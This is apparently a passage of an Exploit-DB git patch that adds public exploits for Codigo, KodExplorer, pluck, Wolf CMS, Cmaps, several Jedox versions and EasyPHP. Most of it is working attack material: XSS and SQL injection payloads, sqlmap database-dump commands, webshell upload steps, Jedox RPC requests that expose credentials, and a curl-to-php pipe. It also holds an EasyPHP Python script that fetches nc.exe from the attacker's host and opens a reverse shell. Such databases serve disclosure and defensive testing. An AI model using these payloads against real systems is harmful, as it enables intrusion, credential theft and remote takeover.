From 8945b320b5b4862fe1232b3a22cc42d07b1392b9 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 6 May 2023 00:16:26 +0000
Subject: [PATCH] DB: 2023-05-06

20 changes to exploits/shellcodes/ghdb

Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution

Cmaps v8.0 - SQL injection

EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)

File Thingie 2.5.7 - Remote Code Execution (RCE)

Intern Record System v1.0 - SQL Injection (Unauthenticated)
Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
Jedox 2022.4.2 - Code Execution via RPC Interfaces
Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
Jedox 2022.4.2 - Remote Code Execution via Directory Traversal

KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)

Online Pizza Ordering System v1.0 - Unauthenticated File Upload

pluck v4.7.18 - Stored Cross-Site Scripting (XSS)

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)
Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)

Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
---
 exploits/multiple/local/51432.txt |  35 ++++++
 exploits/php/webapps/51274.txt    |   2 +-
 exploits/php/webapps/51419.txt    |  48 ++++++++
 exploits/php/webapps/51420.txt    |  77 ++++++++++++
 exploits/php/webapps/51421.txt    |  18 +++
 exploits/php/webapps/51422.txt    |  46 ++++++++
 exploits/php/webapps/51423.txt    | 182 ++++++++++++++++++++++++++++
 exploits/php/webapps/51424.txt    |  28 +++++
 exploits/php/webapps/51425.txt    |  34 ++++++
 exploits/php/webapps/51426.txt    |  25 ++++
 exploits/php/webapps/51427.txt    |  28 +++++
 exploits/php/webapps/51428.txt    |  56 +++++++++
 exploits/php/webapps/51429.txt    |  25 ++++
 exploits/php/webapps/51430.txt    | 116 ++++++++++++++++++
 exploits/php/webapps/51431.py     |  74 ++++++++++++
 exploits/php/webapps/51434.txt    | 151 ++++++++++++++++++++++++
 exploits/php/webapps/51435.txt    |  75 ++++++++++++
 exploits/php/webapps/51436.py     | 189 ++++++++++++++++++++++++++++++
 files_exploits.csv                |  21 +++-
 ghdb.xml                          | 105 +++++++++++++++++
 20 files changed, 1332 insertions(+), 3 deletions(-)
 create mode 100644 exploits/multiple/local/51432.txt
 create mode 100644 exploits/php/webapps/51419.txt
 create mode 100644 exploits/php/webapps/51420.txt
 create mode 100644 exploits/php/webapps/51421.txt
 create mode 100644 exploits/php/webapps/51422.txt
 create mode 100644 exploits/php/webapps/51423.txt
 create mode 100644 exploits/php/webapps/51424.txt
 create mode 100644 exploits/php/webapps/51425.txt
 create mode 100644 exploits/php/webapps/51426.txt
 create mode 100644 exploits/php/webapps/51427.txt
 create mode 100644 exploits/php/webapps/51428.txt
 create mode 100644 exploits/php/webapps/51429.txt
 create mode 100644 exploits/php/webapps/51430.txt
 create mode 100755 exploits/php/webapps/51431.py
 create mode 100644 exploits/php/webapps/51434.txt
 create mode 100644 exploits/php/webapps/51435.txt
 create mode 100755 exploits/php/webapps/51436.py

diff --git a/exploits/multiple/local/51432.txt b/exploits/multiple/local/51432.txt
new file mode 100644
index 000000000..39c57a75d
--- /dev/null
+++ b/exploits/multiple/local/51432.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
+# Date: 2023-05-03
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://alfonzm.github.io/codigo/
+# Software Link: https://github.com/alfonzm/codigo-app
+# Version: 1.0.1
+# Tested on: [Mac OS 13]
+
+Release Date:
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
+2023-05-03
+
+Product & Service Introduction:
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
+=3D=3D=3D=3D=3D=3D
+A Markdown editor & notes app made with Vue & Electron
+
+Technical Details & Description:
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
+=3D=3D=3D=3D=3D=3D=3D
+
+A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
+user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
+
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following pay=
+load:
+<video><source onerror=3D"alert(require('child_process').execSync('/System/=
+Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
+
+Opening the file in Codigo will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/php/webapps/51274.txt b/exploits/php/webapps/51274.txt
index 4f30643a4..d843e111c 100644
--- a/exploits/php/webapps/51274.txt
+++ b/exploits/php/webapps/51274.txt
@@ -26,7 +26,7 @@ or exploit latest vulnerabilities in the underlying database.
 In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.
 Then run SQLmap to extract the data from the database:
 
-sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
+sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
 
 sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
 
diff --git a/exploits/php/webapps/51419.txt b/exploits/php/webapps/51419.txt
new file mode 100644
index 000000000..806e6be7c
--- /dev/null
+++ b/exploits/php/webapps/51419.txt
@@ -0,0 +1,48 @@
+## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
+## Author: nu11secur1ty
+## Date: 04.30.2023
+## Vendor: https://kodcloud.com/
+## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
+## Reference: https://portswigger.net/web-security/file-upload
+
+## Description:
+By using this vulnerability remotely, the malicious pwned_admin can
+list and manipulate all files inside the server. This is an absolutely
+DANGEROUS and STUPID decision from the application owner! In this
+scenario, the attacker prepares the machine for exploitation and sends
+a link for remote execution by using the CURL protocol to his
+supporter - another attacker. Then and he waits for execution from his
+colleague, to mask his action or even more worst than ever. What a
+nice hack is this! :)
+
+STATUS: CRITICAL Vulnerability
+
+[+]Exploit:
+```CURL
+curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
+| php
+curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
+| php
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)
+
+## Proof and Exploit:
+[href](https://streamable.com/98npd0)
+
+## Time spend:
+01:15:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51420.txt b/exploits/php/webapps/51420.txt
new file mode 100644
index 000000000..0099ba919
--- /dev/null
+++ b/exploits/php/webapps/51420.txt
@@ -0,0 +1,77 @@
+Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
+Application: pluck
+Version: 4.7.18
+Bugs:  XSS
+Technology: PHP
+Vendor URL: https://github.com/pluck-cms/pluck
+Software Link: https://github.com/pluck-cms/pluck
+Date of found: 01-05-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. create .svg file.
+2. svg file content:
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+
+3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)
+
+poc request
+
+
+POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
+Host: localhost
+Content-Length: 672
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/pluck-4.7.18/admin.php?action=files
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
+Connection: close
+
+------WebKitFormBoundaryJMTiFxESCx7aNqmI
+Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+------WebKitFormBoundaryJMTiFxESCx7aNqmI
+Content-Disposition: form-data; name="submit"
+
+Upload
+------WebKitFormBoundaryJMTiFxESCx7aNqmI--
+
+
+
+4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
\ No newline at end of file
diff --git a/exploits/php/webapps/51421.txt b/exploits/php/webapps/51421.txt
new file mode 100644
index 000000000..cdc8e3fce
--- /dev/null
+++ b/exploits/php/webapps/51421.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
+# Date: 2023-05-02
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://wolf-cms.readthedocs.io
+# Software Link: https://github.com/wolfcms/wolfcms
+# Version: 0.8.3.1
+# Tested on: Kali Linux
+
+### Steps to Reproduce ###
+
+# Firstly, go to the "Files" tab.
+# Click on the "Create new file" button and create a php file (e.g:
+shell.php)
+# Then, click on the file you created to edit it.
+# Now, enter your shell code and save the file.
+# Finally, go to https://localhost/wolfcms/public/shell.php
+
+### There's your shell! ###
\ No newline at end of file
diff --git a/exploits/php/webapps/51422.txt b/exploits/php/webapps/51422.txt
new file mode 100644
index 000000000..97d12d182
--- /dev/null
+++ b/exploits/php/webapps/51422.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Cmaps v8.0 - SQL injection
+
+- Date: 27.04.2023
+- Exploit Author: Lucas Noki (0xPrototype)
+- Vendor Homepage: https://github.com/vogtmh
+- Software Link: https://github.com/vogtmh/cmaps
+- Version: 8.0
+- Tested on: Mac, Windows, Linux
+- CVE : CVE-2023-29809
+
+*Description:*
+
+The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
+```html
+<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
+```
+
+Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:
+```
+'-(select*from(select+sleep(2)+from+dual)a)--+
+```
+
+The page will sleep for two seconds. This confirms the SQL injection.
+
+*Steps to reproduce:*
+
+1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
+
+2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
+   ```shell
+   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
+   ```
+
+Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
+
+
+
+## Request to the server:
+
+<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />
+
+## Response from the server:
+
+Look at the response time.
+
+<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
\ No newline at end of file
diff --git a/exploits/php/webapps/51423.txt b/exploits/php/webapps/51423.txt
new file mode 100644
index 000000000..1aa34dbf2
--- /dev/null
+++ b/exploits/php/webapps/51423.txt
@@ -0,0 +1,182 @@
+# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2022.4 (22.4.2) and older
+# CVE : CVE-2022-47879
+
+
+Introduction
+=================
+A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"Studio",
+			"getUserCreds"
+		]
+	]
+
+2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker.
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"conn",
+			"test_palo",
+			[
+				"<HOST>",
+				"<PORT>",
+				"",
+				"",
+				true,
+				null
+			]
+		]
+	]
+
+3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user.
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"Studio",
+			"getExternURI",
+			[
+				0,
+				"",
+				[
+					0
+				],
+				{
+					"flag":1
+				}
+			]
+		]
+	]
+
+4) List all available database connections via `conn::ls`:
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"conn",
+			"ls",
+			[
+				null,
+				false,
+				true,
+				[
+					"type",
+					"active",
+					"description"
+				]
+			]
+		]
+	]
+
+5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
+
+	PATH: /tc/rpc
+	METHOD: POST
+	BODY:
+	[
+		[
+			"com.jedox.etl.mngr.Connections",
+			"getGlobalConnection",
+			[
+				"<CONNECTION>"
+			]
+		]
+	]
+
+6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS):
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"common",
+			"decrypt",
+			[
+				"<ENCRYPTEDCREDS>"
+			]
+		]
+	]
+
+7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"common",
+			"paloGet",
+			[
+				null,
+				"Config",
+				"#_config",
+				[
+					"config"
+				],
+				{
+					"config": [
+						"<CONFIG>"
+					]
+				},
+				true,
+				true
+			]
+		]
+	]
+
+8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"palo_mgmt",
+			"sess_list",
+			[
+				null
+			]
+		]
+	]
+
+9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"palo_mgmt",
+			"lic_users_list",
+			[
+				"0"
+			]
+		]
+	]
\ No newline at end of file
diff --git a/exploits/php/webapps/51424.txt b/exploits/php/webapps/51424.txt
new file mode 100644
index 000000000..10dedb7e1
--- /dev/null
+++ b/exploits/php/webapps/51424.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2022.4 (22.4.2) and older
+# CVE : CVE-2022-47875
+
+
+Introduction
+=================
+A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).
+
+2) Upload a PHP file and note the file system path (`fspath`)
+
+3) Get RCE via Directory Traversal
+
+	PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php
+	METHOD: POST
\ No newline at end of file
diff --git a/exploits/php/webapps/51425.txt b/exploits/php/webapps/51425.txt
new file mode 100644
index 000000000..141759730
--- /dev/null
+++ b/exploits/php/webapps/51425.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2020.2 (20.2.5) and older
+# CVE : CVE-2022-47877
+
+
+Introduction
+=================
+A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) Store log entry with XSS payload:
+
+	PATH: /ub/ccmd
+	METHOD: POST
+	BODY:
+	[
+		[
+			"log",
+			"error",
+			"<img src=# onerror=\"alert('XSS')\">"
+		]
+	]
+
+2) Trigger XSS payload by opening the Logs page and showing the respective log entry.
\ No newline at end of file
diff --git a/exploits/php/webapps/51426.txt b/exploits/php/webapps/51426.txt
new file mode 100644
index 000000000..d118bb0e3
--- /dev/null
+++ b/exploits/php/webapps/51426.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2020.2 (20.2.5) and older
+# CVE : CVE-2022-47878
+
+
+Introduction
+=================
+Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/.
+
+2) Then any upload/import function can be used to upload a .php webshell file to the webroot.
+
+3) Execute webshell from the webroot directory to obtain RCE.
\ No newline at end of file
diff --git a/exploits/php/webapps/51427.txt b/exploits/php/webapps/51427.txt
new file mode 100644
index 000000000..e9f0f0003
--- /dev/null
+++ b/exploits/php/webapps/51427.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
+# Date: 28/04/2023
+# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2020.2 (20.2.5) and older
+# CVE : CVE-2022-47876
+
+
+Introduction
+=================
+Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
+
+	def sout = new StringBuilder(), serr = new StringBuilder()
+	def proc = 'whoami'.execute()
+	proc.consumeProcessOutput(sout, serr)
+	proc.waitForOrKill(10000)
+	LOG.error(sout.toString());
+	LOG.error(serr.toString());
\ No newline at end of file
diff --git a/exploits/php/webapps/51428.txt b/exploits/php/webapps/51428.txt
new file mode 100644
index 000000000..d53049e73
--- /dev/null
+++ b/exploits/php/webapps/51428.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2020.2 (20.2.5) and older
+# CVE : CVE-2022-47874
+
+
+Introduction
+=================
+Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
+
+	PATH: /be/rpc.php
+	METHOD: POST
+	BODY:
+	[
+		[
+			"conn",
+			"ls",
+			[
+				null,
+				false,
+				true,
+				[
+					"type",
+					"active",
+					"description"
+				]
+			]
+		]
+	]
+
+2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
+
+	PATH: /tc/rpc
+	METHOD: POST
+	BODY:
+	[
+		[
+			"com.jedox.etl.mngr.Connections",
+			"getGlobalConnection",
+			[
+				"<CONNECTION>"
+			]
+		]
+	]
\ No newline at end of file
diff --git a/exploits/php/webapps/51429.txt b/exploits/php/webapps/51429.txt
new file mode 100644
index 000000000..0cf1612a3
--- /dev/null
+++ b/exploits/php/webapps/51429.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
+# Date: 28/04/2023
+# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
+# Vendor Homepage: https://jedox.com
+# Version: Jedox 2022.4 (22.4.2) and older
+# CVE : CVE-2022-47880
+
+
+Introduction
+=================
+An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.
+
+
+Write-Up
+=================
+See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
+
+
+Proof of Concept
+=================
+1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control.
+
+2) Test the database connection.
+
+3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.
\ No newline at end of file
diff --git a/exploits/php/webapps/51430.txt b/exploits/php/webapps/51430.txt
new file mode 100644
index 000000000..893fcf752
--- /dev/null
+++ b/exploits/php/webapps/51430.txt
@@ -0,0 +1,116 @@
+# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and
+Path Traversal)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2022-02-06
+# Vendor Homepage: https://www.easyphp.org/
+# Software Link : https://www.easyphp.org/
+# Tested Version: 14.1
+# Tested on:  Windows 7 and 10
+
+# Vulnerability Type: Remote Command Execution (RCE)
+
+CVSS v3: 9.8
+CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+CWE: CWE-78
+
+Vulnerability description: There is an OS Command Injection in EasyPHP
+Webserver 14.1 that allows an attacker to achieve Remote Code Execution
+(RCE) with administrative privileges.
+
+Proof of concept:
+
+To detect:
+
+POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 28
+Origin: http://127.0.0.1:10000
+Connection: keep-alive
+Referer: http://127.0.0.1:10000/index.php?zone=settings
+Host: 127.0.0.1:10000
+
+app_service_control=calc.exe
+
+The calculator opens.
+
+Exploit:
+
+# !/usr/bin/python3
+import requests
+import sys
+
+if len(sys.argv) != 5:
+    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
+    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %
+sys.argv[0])
+    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %
+sys.argv[0])
+    exit(1)
+
+else:
+    target = sys.argv[1]
+    targetport = sys.argv[2]
+    localip = sys.argv[3]
+    localport = sys.argv[4]
+    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in
+the directory
+
+    payload =
+"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
++ localip + ':8000' +
+"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
++ localip + "+" + localport + "+-e+cmd.exe\""
+    print (payload)
+    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
+    }
+    data = {'app_service_control':payload}
+
+    try:
+        r = requests.post(url, headers=headers, data=data)
+    except requests.exceptions.ReadTimeout:
+        print("The payload has been sent. Check it!")
+        pass
+
+
+# Vulnerability Type: Path Traversal
+
+CVSS v3: 6.5
+CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+CWE: CWE-22
+
